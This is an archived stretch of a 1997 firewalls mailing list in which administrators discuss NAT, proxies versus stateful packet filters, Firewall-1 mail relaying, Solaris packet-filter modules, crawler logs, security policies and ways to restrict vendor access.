References: <199706071621.JAA07513@honor.greatcircle.com>
In-Reply-To: <199706071621.JAA07513@honor.greatcircle.com>; from Jamie Thain on Sat, Jun 07, 1997 at 01:24:18PM -0300

Hello Jamie,

two things:

a) describing Internet Protocols in OSI Layers is IMHO blasphemic.

and

b) Yes, NAT has to work on the TCP Layer for rewriting stuff like FTP's PORT Command or opening UDP Data Stream Channels by TCP Control Connection Parsing (audio streams). Of course it does not need to work on (TCP/IP) Layer 3, but, if it is restricted to Layer (TCP/IP) 2, a lot of applications simply will break.

Greetings
Bernd

-- 
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )  ecki@{inka.de,linux.de,debian.org}  http://home.pages.de/~eckes/
  o--o     *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
(O____O)  If privacy is outlawed only Outlaws have privacy

From owner-firewalls-outgoing Sun Jun 8 18:25:17 1997
From: Bernd Eckenfels
To: carson@lehman.com
Cc: Anton J Aylward, "Mark Horn [ Net Ops ]", Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
Date: Mon, 9 Jun 1997 02:37:06 +0200
References: <3.0.32.19970604114909.00952700@the-wire.com> <199706041824.OAA19517@dragon.lehman.com>
In-Reply-To: <199706041824.OAA19517@dragon.lehman.com>; from carson@lehman.com on Wed, Jun 04, 1997 at 02:24:02PM -0400

> Anton> One public address, and a 10.x.x.x of internal addresses and web
                 ------------------
> Anton> servers. POW! The address space problem just went away.
> 
> It's called NAT (or NAPT) and is part of ip-filter. There are even diffs for
> making the fwtk app proxies work with it. Next question?

With one public address you can run only one WWW Server on Port 80.

Greetings
Bernd

-- 
  (OO)      -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de --
 ( .. )  ecki@{inka.de,linux.de,debian.org}  http://home.pages.de/~eckes/
  o--o     *plush*  2048/93600EFD  eckes@irc  +4972573817  BE5-RIPE
(O____O)  If privacy is outlawed only Outlaws have privacy

From owner-firewalls-outgoing Sun Jun 8 18:27:02 1997
From: "Hakan Abus"
Subject: help me please ....!
Date: Fri, 6 Jun 1997 22:22:34 +0300
Message-Id: <19212257112883@turknet.com.tr>

Firstly: please help me about fireball! I want to learn what it is. And frequently, I am subjected to nuke fire... and I never escape from this. I can not use the chat securely. Therefore, if you send me some acknowledge about protecting from these sabotages I will be very grateful. You can send some ideas and file download sites' addresses so that I can find the helpful details, because I am very interested in this issue.

PS. In short, I want to be protected from nuke. That's all.

Thanks for your help...
TURK NOKTA NET support team

From owner-firewalls-outgoing Sun Jun 8 19:10:34 1997
From: "Cai Xuewu"
To: "firewalls mailing list"
Subject: NAT??
Date: Mon, 9 Jun 1997 09:56:39 -0000
Message-Id: <9706090054.AA22162@saturn.shcei.co.cn>

Hi, friends:

I heard of NAT, but its definitions and functions are not clear to me; can you tell me?

==========================|===========================
Cai Xuewu                 |Shanghai Information Center
xwcai@saturn.shcei.co.cn  |
                          |
HuaShan Road 1076         |
Shanghai 200050           |
P.R.C                     |
==========================|===========================

From owner-firewalls-outgoing Sun Jun 8 20:10:42 1997
From: Chris Lonvick
To: "Cai Xuewu", "firewalls mailing list"
Subject: Re: NAT??
Date: Sun, 08 Jun 1997 21:53:35 -0500
Message-Id: <2.2.32.19970609025335.00702b60@diablo.cisco.com>

Hi,

It's Network Address Translation and is described in RFC-1631. Its best use is to have non-NIC-assigned addresses in your private network and use the NAT to translate them to NIC-assigned addresses on the Internet. The address ranges that will not conflict with NIC-legal addresses on the Internet are described in RFC-1918.

Hope this helps,
Chris Lonvick
Cisco Systems Consulting Engineering
Houston, TX, USA
+1.713.778.5663

At 09:56 AM 6/9/97 -0000, Cai Xuewu wrote:
>Hi, friends:
>
> I heard of NAT, but its definitions and functions are not clear to me; can
>you tell me?
>
>==========================|===========================
>Cai Xuewu                 |Shanghai Information Center
>xwcai@saturn.shcei.co.cn  |
>                          |
>HuaShan Road 1076         |
>Shanghai 200050           |
>P.R.C                     |
>==========================|===========================
>
>
>

From owner-firewalls-outgoing Sun Jun 8 20:55:26 1997
From: Anton J Aylward
To: Bernd Eckenfels
Cc: firewalls@greatcircle.com
Subject: Re: Plug-gw- One to many relationship
Date: Sun, 08 Jun 1997 23:48:22 -0400
Message-Id: <3.0.32.19970608233222.0096f100@the-wire.com>

At 02:37 AM 09/06/97 +0200, you wrote:
## Reply Start ##
>> Anton> One public address, and a 10.x.x.x of internal addresses and web
>                  ------------------
>> Anton> servers. POW! The address space problem just went away.
>>
>> It's called NAT (or NAPT) and is part of ip-filter. There are even diffs for
>> making the fwtk app proxies work with it. Next question?
>
>With one public address you can run only one WWW Server on Port 80.

That's just my point. Despite many people telling me the one-to-many has some magic way of extracting the data lost in the many-to-one mapping. Yes, I've had people tell me no information is lost in the multi-hosts sharing one IP address. Just having NAT doesn't work that magic. This is about incoming, not outgoing, plugs.
Thanks, Bernd, for restoring my confidence that someone out there knows what I was talking about.

>Greetings
>Bernd
## Reply End ##

From owner-firewalls-outgoing Sun Jun 8 21:10:28 1997
From: "Craig I. Hagan"
Reply-To: hagan@cih.com
To: Ryan Russell/SYBASE
cc: "Simon J. Gerraty", firewalls
Subject: Re: Stateful Packet Filters vs. Proxies
Date: Sun, 8 Jun 1997 10:05:02 -0400 (EDT)
In-Reply-To: <199706080120.SAA28926@notesgw2.sybase.com>

> Sure, an FTP proxy that can decrypt your
> encrypted FTP session will work, same as
> a SPF with the same features will.
>
> If a SPF or a proxy can act as one endpoint
> of an encrypted connection, it can watch
> for the port command and deal with it.
>
> You seem to be under the impression that SPFs
> aren't capable of understanding the protocol
> being routed... if that were the case, the non-encrypted
> FTP session wouldn't work over the PIX box with NAT
> enabled, would it? There is no reason that the SPF
> software can't be designed to act as an encryption
> endpoint, but apparently the PIX hasn't for FTP.
>

I agree with you that you can make an SPF which can handle any case that a proxy can. However, it is far easier for the end user (read f/w implementor) to modify proxy code such that it will match the requirements of his/her site than it is for the end user to modify an SPF.

-- craig

-------------------------------------------------------------------------------
Craig I. Hagan     "It's a small world, but I wouldn't want to back it up"
hagan@cih.com      "True hackers don't die, their ttl expires"
                   "It takes a village to raise an idiot, but an idiot can raze a village"

From owner-firewalls-outgoing Sun Jun 8 21:25:57 1997
From: "Edkins, Rob - Axon AKL"
To: "'martin@nii.ncb.gov.sg'", "'Francisco Lopez (Infovia)'"
Cc: "'firewalls@GreatCircle.COM'"
Subject: RE: CheckPoint Firewall-1 V. 2.1
Date: Mon, 9 Jun 1997 16:22:43 +1200

Upgrade to version 3.0 of Firewall-1 and use the SMTP Security Server feature. This acts as an SMTP Relay, accepting the mail, then queuing it on. You could set it up in both directions (in which case you wouldn't need address translation)
or set one up for inbound and open an SMTP filter out, with address translation as below. The big advantage of the security server is that nobody from outside touches your Exchange box directly.

Yet another way would be to install the SMTP postoffice from the NT4 Server Resource Kit onto your v2.1 firewall and configure this as a relay.

>-----Original Message-----
>From: Martin Khoo [SMTP:martin@nii.ncb.gov.sg]
>Sent: Saturday, May 31, 1997 12:47 PM
>To: Francisco Lopez (Infovia)
>Cc: firewalls@GreatCircle.COM
>Subject: Re: CheckPoint Firewall-1 V. 2.1
>
>Francisco Lopez (Infovia) wrote:
>
>> Hello everyone...
>> this is just to ask for help from someone who has made checkpoint
>> firewall-1 ver.2.1 work efficiently with Microsoft Exchange V.5 (which is inside
>> the protected network). When I put my Exchange server directly connected to
>> the router it works just fine (using valid IP addresses), but after having
>> put it back to the protected network (with invalid IP addresses) the
>> firewall seems not to be handling the procedure (it drops all the mail
>> packets -inbound and outbound-). I have opened the specific ports (25 and
>> 110) but still it did not solve the problem. So far all the users in the
>> protected network are just able to use their browsers but not to
>> send/receive mail from the internet. Has anyone had a situation like
>> this? If so... how did you make it work?
>>
>> Francisco Lopez
>> IIDS - Infovia
>> Guatemala CA
>> (502) 336-6236 ext. 303
>
> Hi,
>
>A few things you need to do to get it to work:
>
>(1) If you intend to hide the Exchange server in the protected n/w, then
>you would need to use FW-1 Network Address mapping to map it into a valid IP
>so that external mail servers can contact it. You need to use the
>FW_SRC_STATIC & FW_DST_STATIC mode of address translation. Read the admin
>guide under the chapter on Address Translation.
>
>Alternatively, put the Exchange server on a DMZ and use a valid IP for it.
>Set up rules in the rulebase to permit SMTP traffic (port 25) from external
>to it and SMTP & POP3 (port 110) from internal to it.
>
>(2) Make sure that the MX record in your DNS points to the VALID IP of
>the Exchange server.
>
>cheers!
>--
>Martin Khoo
>Senior IT Architect (Security & Cryptography)
>Information Infrastructure Group
>National Computer Board
>Email: martin@nii.ncb.gov.sg, mkhoo@ncb.gov.sg, markhoo@hotmail.com
>DID: 7703878 FAX: 7747159
>PGP: 1D 5F DA E5 56 CD 6A B6 FA E0 83 55 BD 07 9C C0
>

From owner-firewalls-outgoing Sun Jun 8 21:40:12 1997
From: FIREWALL
To: firewalls@GreatCircle.COM
cc: mike.jones@unifiedtech.com
Subject: f/w kernel module in Solaris handling IP packets
Date: Mon, 9 Jun 1997 09:54:08 +0500 (GMT+0500)

Hi everybody,

I'm Rajesh P.G., a computer science student at Regional Engineering College - Calicut, Kerala State, India. As a classroom project, I'm implementing a 'Packet Filter Firewall'. Initially, I had worked on the idea of doing this project on one of our machines running Solaris. I realised later that getting the firewall running will require modifications to the kernel source handling IP packets. (I don't have the Solaris kernel source code, so I switched to Linux.)

In one of the replies, Mike Jones mentioned that FireWall-1, which works on Solaris, installs a module "which is in the path the IP packets go through".
I guess that it'll require access to the kernel source to incorporate such modules. Could someone please tell me if there are other alternatives to install the concerned module?

Thanks in advance,
Rajesh P.G.
Email: rajesh@vishak.reccal.ernet.in

(6/6/97)
~~~~~~~~~~~~~~~ Original Message ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: Mike Jones
To: Pedro Salgueiro
CC: "'Mike Jones'", "'firewalls'"
Subject: Re: PIX and Firewall-1

Pedro Salgueiro wrote:

> I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some:

> 1 - Packet filtering firewalls are more difficult to manage (It is very simple to mis-configure => less secure).
> It may be very complicated establishing rules.

I would dispute this, at least as regards FireWall-1. My experience and all the reviews I've seen agree that it's very easy to manage. Now it's certainly the case that something that's easy to configure is easy to MISconfigure, but I don't think there's a firewall in the world that can make up for an admin who doesn't know what he's doing.

> 2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known constructor firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one.

I'd be *very* interested in knowing whose firewall that was. I also don't think this is necessarily the case. For example, FireWall-1 (which is the firewall I'm most familiar with) works on Solaris by installing a kernel module which is in the path that IP packets go through. I have a hard time seeing how it could "fail open" in that configuration, though I'd admit that it's theoretically possible.

> 3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols, i.e., you open or close a port. Application level firewalls provide secure daemons of those protocols.

This is an advantage of application level firewalls. However, there are reasons other than security (caching and spam filtering, for example) to have proxies in place, and I actually prefer an architecture where the security functions, whether proxy or filter based, are separated from the non-security functions.

> Regards,
> ----------
> From: Mike Jones
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From owner-firewalls-outgoing Sun Jun 8 23:32:00 1997
From: Mike Hedlund
To: FIREWALL
cc: firewalls@GreatCircle.COM, mike.jones@unifiedtech.com
Subject: Re: f/w kernel module in Solaris handling IP packets
Date: Sun, 8 Jun 1997 23:17:51 -0700 (PDT)

On Mon, 9 Jun 1997, FIREWALL wrote:

> In one of the replies, Mike Jones mentioned that FireWall-1, which
> works on Solaris, installs a module "which is in the path the IP packets
> go through". I guess that it'll require access to the kernel source to
> incorporate such modules. Could someone please tell me if there are other
> alternatives to install the concerned module?
>

With Solaris, you can actually 'push' a filter onto the data stream of a network interface. I suggest locating the book 'SYSV Network Programming', since this subject is far too large to be contained on a mailing list. :) Or for some actual example code, go take a look at IP Filter..
if memory serves its available at ftp://coast.cs.purdue.edu/pub/tools/unix/ipf -mike From owner-firewalls-outgoing Sun Jun 8 23:40:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA12987 for firewalls-outgoing; Sun, 8 Jun 1997 23:03:04 -0700 (PDT) Received: from onshore.com (irc.onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id XAA12886 for ; Sun, 8 Jun 1997 23:02:42 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id BAA22262; Mon, 9 Jun 1997 01:03:35 -0500 Date: Mon, 9 Jun 1997 01:03:35 -0500 From: Craig Brozefsky Subject: RE: CheckPoint Firewall-1 V. 2.1 To: "Edkins, Rob - Axon AKL" cc: "'martin@nii.ncb.gov.sg'" , "'Francisco Lopez (Infovia)'" , "'firewalls@GreatCircle.COM'" In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 9 Jun 1997, Edkins, Rob - Axon AKL wrote: > Upgrade to version 3.0 of Firewall 1 and use the SMTP Security Server > feature. > > This acts as an SMTP Relay, accepting the mail, then queuing it on. Does it perform an address parsing etc...? > Big advantage of the security server is that nobody from outside touches > your Exchange box directly. Yup. > Yet another way would be to install the SMTP postoffice from the NT4 > Server Resource kit onto your v2.1 firewall and configure this as a > relay. I think that would be a really bad idea. Do not put code not specifically designed to operate ina secure environment on a firewall. NT4 postoffice is not my idea of 'secure' smtp service and I certainly would not want it running on a firewall. Craig Brozefsky craig@onshore.com onShore Inc. 
http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash)

From owner-firewalls-outgoing Mon Jun 9 00:14:32 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA19085 for firewalls-outgoing; Sun, 8 Jun 1997 23:49:04 -0700 (PDT)
Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id XAA19021 for ; Sun, 8 Jun 1997 23:48:51 -0700 (PDT)
Received: from Mailhub by garanti1.garanti.com.tr id AA11238; Mon, 9 Jun 1997 09:50:18 +0400
Received: from GarantiUser by GarantiMailServer id AA03800; Mon, 9 Jun 1997 09:49:34 +0400
Received: from [10.0.4.106] by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA38052; Mon, 9 Jun 1997 09:47:31 +0400
Message-Id: <339C33ED.7A3A@garanti.com.tr>
Date: Mon, 09 Jun 1997 09:48:45 -0700
From: Cihan Subasi
Reply-To: csubasi@garanti.com.tr
Organization: Garanti Ticaret
X-Mailer: Mozilla 3.0Gold (Win16; I)
Mime-Version: 1.0
To: Firewall Mailing List
Subject: Internet Secýrity Policy...
Content-Type: text/plain; charset=iso-8859-9
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I need to create an Internet & Security policy for the company, if anybody can send me a copy of their policy or tell me where I can find such a thing so I can take a look at it, it will be great....
Thanks,
--
***************************************************************
Cihan Subasi
Garanti Ticaret, Istanbul Turkey

email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404
Fax = +902126570473
***************************************************************

From owner-firewalls-outgoing Mon Jun 9 03:25:21 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA10497 for firewalls-outgoing; Mon, 9 Jun 1997 03:18:21 -0700 (PDT)
Received: from h01.scientia.com (h01.scientia.com [194.216.183.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id DAA10487 for ; Mon, 9 Jun 1997 03:17:58 -0700 (PDT)
Received: by h01.scientia.com with SMTP id LAA04284 for ; Mon, 9 Jun 1997 11:18:27 +0100
Message-Id: <199706091018.LAA04284@h01.scientia.com>
X-Sender: firewall@pop-server
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Mon, 09 Jun 1997 11:17:41 +0100
To:
From: Ian Miller
Subject: Re: nt web server log
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 15:44 06/06/97 -0500, Peter da Silva wrote:
>The really annoying thing was that these sites were returning pages at
>my home box INSTEAD of the more recently updated ones online!
>
>The thing is, if a webcrawler is returning pages that have been sending
>a 404 for 7 months, how much can it be trusted?
>

I think I can see how this can happen, and it is a good example of the importance of appropriate robots.txt files.

Some sites to ensure maximum hits have various mechanisms to prevent caching like inventing dynamic names for every link in every page. This means that any robot thinks it has found an infinite sized site as it never gets the same URL twice. (An appropriate robots.txt file should limit robots to the static URLs only.) It just needs one site like that to include an out-of-date link to your site and the robot will keep encountering references to your site.
As most robots won't keep records of 404ed pages, they will keep coming back.

It would be worthwhile logging the "referring site" for all of these hits and then contacting the webmaster(s) suggesting:
1) They install an appropriate robots.txt
2) They correct the links to your site.

Ian

From owner-firewalls-outgoing Mon Jun 9 04:55:42 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA16245 for firewalls-outgoing; Mon, 9 Jun 1997 04:50:30 -0700 (PDT)
Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA16237 for ; Mon, 9 Jun 1997 04:50:23 -0700 (PDT)
Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id HAA25241; Mon, 9 Jun 1997 07:48:00 -0400 (EDT)
From: Adam Shostack
Message-Id: <199706091148.HAA25241@homeport.org>
Subject: Re: Restrict Springboarding
In-Reply-To: <199706081622.JAA00162@notesgw2.sybase.com> from Ryan Russell/SYBASE at "Jun 8, 97 09:28:13 am"
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Date: Mon, 9 Jun 1997 07:48:00 -0400 (EDT)
Cc: khanhi@emirates.com, Firewalls@GreatCircle.COM
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Your third choice (if management will back you) is to contract that they won't bounce, use a tty sniffer* to watch their actions, and then recover damages if they hop on.

You might also use some form of process accounting to see what programs they invoke, and challenge them on it. Install a wrapper around (telnet, rsh, rlogin, ssh, etc). Use a restricted shell that only allows them a certain path, and give them a short list of useful tools (sed, awk, agrep, ps) to do their work, but nothing else without asking permission.

* I say a TTY sniffer because of course you are using an encrypted telnet to come in over the internet.
Adam

Ryan Russell/SYBASE wrote:
| Your two choices are to put the hosts they do get
| access to into a DMZ, or to increase security on all
| the other hosts in your network. In your net, option
| 2 probably isn't practical.
|
| Ryan
|
| ---------- Previous Message ----------
| From: khanhi @ emirates.com (Hidayatullah Khan) @ smtp
| Subject: Restrict Springboarding
|
| Hello All,
| Ours is a large organization with a class B addressing. We have a
| firewall in place to allow outgoing web and mail services. Often we
| have vendors coming in to our systems to support their applications. Our
| firewall is configured to allow the vendors to telnet to specific hosts.
| On a couple of occasions I have noticed a vendor's presence on a
| different host for which he was not intended to. My question is how can
| we restrict a vendor from "springboarding" (i.e. telnetting to other
| machines on our network) from the actual specific host.
| Thanks in Adv,
| Khan

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From owner-firewalls-outgoing Mon Jun 9 05:40:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA18099 for firewalls-outgoing; Mon, 9 Jun 1997 05:24:33 -0700 (PDT)
Received: from mail.pfsfhq.com ([199.250.186.134]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id FAA18092 for ; Mon, 9 Jun 1997 05:24:28 -0700 (PDT)
Received: from neteng02 ([199.250.186.188]) by mail.pfsfhq.com (8.6.12/8.6.9) with SMTP id MAA29645 for ; Mon, 9 Jun 1997 12:30:41 -0400
Message-Id: <199706091630.MAA29645@mail.pfsfhq.com>
X-Mailer: Calypso Version 2.10.18
Date: Mon, 09 Jun 1997 08:24:42 -0400
From: "John Kemker"
To: firewalls@greatcircle.com
Subject: RE: ISP Connection
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I'm still curious about the indemnification clause. Lawyers like to reduce liability. It's their job. Insurance company lawyers like it even more than most. (Notice who I work for.)
I would be very surprised if your insurance lawyers did not assist your corporate lawyers in crafting a carefully worded set of clauses in your contracts limiting your liability (and, therefore, the amount they would have to pay on a claim) to the very least amount possible.

This reminds me of the situation that occurred when they were building the Hancock building in Boston. The builder had specified a particular size glass, but the glass company had delivered a slightly smaller size glass. A particularly nasty wind cropped up and pulled huge sheets of glass off the building and blew them all over Boston. Hancock went to the contractor, who in turn went to the subcontractor (the glass company). They insisted on being recompensed for the damages. The glass company filed a claim with their insurance company...

...John Hancock was their insurance company.

Firewalls Moral: Be careful to know who is liable in case of a problem. It may be you.

=========== REPLY PARTITION ===========
On 06/06/97, at 05:15 PM, Paquette, Trevor wrote:

>We have insurance for damage that may be caused by a break in.
>I don't know what type of insurance it is, but it is supposed to cover
>us in those situations.
>
>
>> However what I'm curious about is whether mcc.net is really completely
>> "on
>> the hook" in this situation. BBN's SitePatrol, for example, comes
>> with an
>> extensive indemnification clause in its agreements ("if you're broken
>> into,
>> we're not liable"). Are you saying that mcc.net doesn't have one of
>> these
>> clauses in their agreements?
>>

John E. Kemker III
Systems Engineer, Primerica Financial Services
3120 Breckinridge Blvd., Duluth, GA 30199

From owner-firewalls-outgoing Mon Jun 9 05:55:26 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA19566 for firewalls-outgoing; Mon, 9 Jun 1997 05:40:14 -0700 (PDT)
Received: from sl001.infi.net (sl001.infi.net [205.219.238.210]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA19554 for ; Mon, 9 Jun 1997 05:40:08 -0700 (PDT)
Received: (from swright@localhost) by sl001.infi.net (8.8.5/8.8.5) id IAA03006; Mon, 9 Jun 1997 08:37:36 -0400 (EDT)
Date: Mon, 9 Jun 1997 08:37:36 -0400 (EDT)
From: Steve Wright
To: Cihan Subasi
cc: Firewall Mailing List
Subject: Re: Internet Secýrity Policy...
In-Reply-To: <339C33ED.7A3A@garanti.com.tr>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Look up RFC 1244 at internic....

On Mon, 9 Jun 1997, Cihan Subasi wrote:

> I need to create an Internet & Security policy for the company, if
> anybody can send me a copy of their policy or tell me where I can find
> such a thing so I can take a look at it, it will be great....
>
> Thanks,
> --
>
>
> ***************************************************************
> Cihan Subasi
> Garanti Ticaret, Istanbul Turkey
>
> email= cihans@garanti.com.tr or csubasi@garanti.com.tr
> Phone= +902126570404
> Fax = +902126570473
> ***************************************************************
>

From owner-firewalls-outgoing Mon Jun 9 06:10:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA21040 for firewalls-outgoing; Mon, 9 Jun 1997 06:04:08 -0700 (PDT)
Received: from mail.baileynm.com (fw.baileynm.com [206.109.159.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA21025 for ; Mon, 9 Jun 1997 06:04:01 -0700 (PDT)
Received: (qmail 6307 invoked from smtpd); 9 Jun 1997 13:04:44 -0000
Received: from web.nmti.com (root@198.178.0.201) by fw.nmti.com with SMTP; 9 Jun 1997 13:04:44 -0000
Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id IAA15877; Mon, 9 Jun 1997 08:04:44 -0500
Received: by sonic.nmti.com; id AA00887; Mon, 9 Jun 1997 08:05:32 -0500
From: peter@baileynm.com (Peter da Silva)
Message-Id: <9706091305.AA00887@sonic.nmti.com.nmti.com>
Subject: Re: nt web server log
To: firewalls@scientia.com (Ian Miller)
Date: Mon, 9 Jun 1997 08:05:32 -0500 (CDT)
Cc: firewalls@greatcircle.com
In-Reply-To: <199706091018.LAA04284@h01.scientia.com> from "Ian Miller" at Jun 9, 97 11:17:41 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> As most robots won't keep records of 404ed pages, they will keep
> coming back.

If they already have a record of a page, and they get a 404, why would they keep the record around? I added a robots.txt file as soon as I understood what was happening, but it still took them from March to January to clear.

> 1) They install an appropriate robots.txt
> 2) They correct the links to your site.
The referring site was always altavista, lycos, webcrawler, and so on. They had absolutely no sympathy for my situation.

From owner-firewalls-outgoing Mon Jun 9 06:40:49 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA22818 for firewalls-outgoing; Mon, 9 Jun 1997 06:17:59 -0700 (PDT)
Received: from datacommcorp.com ([206.152.253.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA22759 for ; Mon, 9 Jun 1997 06:17:46 -0700 (PDT)
Message-Id: <199706091317.GAA22759@honor.greatcircle.com>
Received: from [199.34.57.89] by datacommcorp.com (SMTPD32-95.10.15) id A37C590168; Mon Jun 09 09:22:04 1997
From: "Steve Rudolph"
To: "firewalls"
Subject: Centri Anyone?
Date: Mon, 9 Jun 1997 09:21:42 -0400
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1161
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello group,

I am still kind of new here, but there have been many replies in regards to my Cisco router situation, and my earlier nt routing/FW-1 issues. Thanks for all of your public and private replies, they have all been very helpful.

I saw someone mention this Centri firewall in the group late last week and it looked like a good firewall at their site. http://www.centri.com I requested information from them and am awaiting the arrival of the more detailed white papers. Has anyone had any experience with this Centri? It looks like this firewall combines all of the latest and greatest firewall stuff. Any comments welcome.
Steve Rudolph
http://www.datacommcorp.com
srudolph@datacommcorp.com
http://www.rude-dog.com

From owner-firewalls-outgoing Mon Jun 9 06:48:22 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id FAA20421 for firewalls-outgoing; Mon, 9 Jun 1997 05:52:12 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id FAA20404 for ; Mon, 9 Jun 1997 05:51:56 -0700 (PDT)
Message-Id: <199706091251.FAA20404@honor.greatcircle.com>
Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA241830358; Mon, 9 Jun 1997 22:45:58 +1000
From: Darren Reed
Subject: Re: Stateful Packet Filters vs. Proxies
To: hagan@cih.com
Date: Mon, 9 Jun 1997 22:45:58 +1000 (EST)
Cc: Ryan.Russell@sybase.com, sjg@quick.com.au, firewalls@GreatCircle.COM
In-Reply-To: from "Craig I. Hagan" at Jun 8, 97 10:05:02 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Craig I. Hagan, sie said:
>
> > Sure, an FTP proxy that can decrypt your
> > encrypted FTP session will work, same as
> > a SPF with the same features will.
> >
> > If a SPF or a proxy can act as one endpoint
> > of an encrypted connection, it can watch
> > for the port command and deal with it.
> >
> > You seem to be under the impression that SPFs
> > aren't capable of understanding the protocol
> > being routed... if that were the case, the non-encrypted
> > FTP session wouldn't work over the PIX box with NAT
> > enabled, would it? There is no reason that the SPF
> > software can't be designed to act as an encryption
> > endpoint, but apparently the PIX hasn't for FTP.
> >
>
> I agree with you that you can make an SPF which can
> handle any case that a proxy can.
> However, it is far
> easier for the end user (read f/w implementor) to modify
> proxy code such that it will match the requirements
> of his/her site than it is for the end user to modify
> an SPF.

Add to this discussion that, to date, SPF's (and in-kernel proxies) have yet to be proven to be as reliable as real proxies. There have been cases emerging here in which the flaws in current implementations (of SPFs) became evident.

FWIW, a SPF != a proxy

And whilst "anything is possible", current SPF technology does not yet appear to have advanced far enough to allow them to work as universally well as proxies.

Darren

From owner-firewalls-outgoing Mon Jun 9 06:51:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id GAA22058 for firewalls-outgoing; Mon, 9 Jun 1997 06:13:00 -0700 (PDT)
Received: from interlock.amoco.com (interlock.amoco.com [192.195.167.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id GAA22024 for ; Mon, 9 Jun 1997 06:12:51 -0700 (PDT)
From: dmburns@amoco.com
Received: by interlock.amoco.com id AA08710 (InterLock SMTP Gateway 3.0 for firewalls-digest@greatcircle.com); Mon, 9 Jun 1997 08:13:34 -0500
Message-Id: <199706091313.AA08710@interlock.amoco.com>
Received: by interlock.amoco.com (Protected-side Proxy Mail Agent-3); Mon, 9 Jun 1997 08:13:34 -0500
Received: by interlock.amoco.com (Protected-side Proxy Mail Agent-2); Mon, 9 Jun 1997 08:13:34 -0500
Received: by interlock.amoco.com (Protected-side Proxy Mail Agent-1); Mon, 9 Jun 1997 08:13:34 -0500
X-Openmail-Hops: 1
Date: Mon, 9 Jun 97 08:13:30 -0500
Subject: Another Winframe question
Mime-Version: 1.0
To: firewalls-digest@greatcircle.com
Content-Type: multipart/mixed; boundary="openmail-part-00cc2f3f-00000001"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

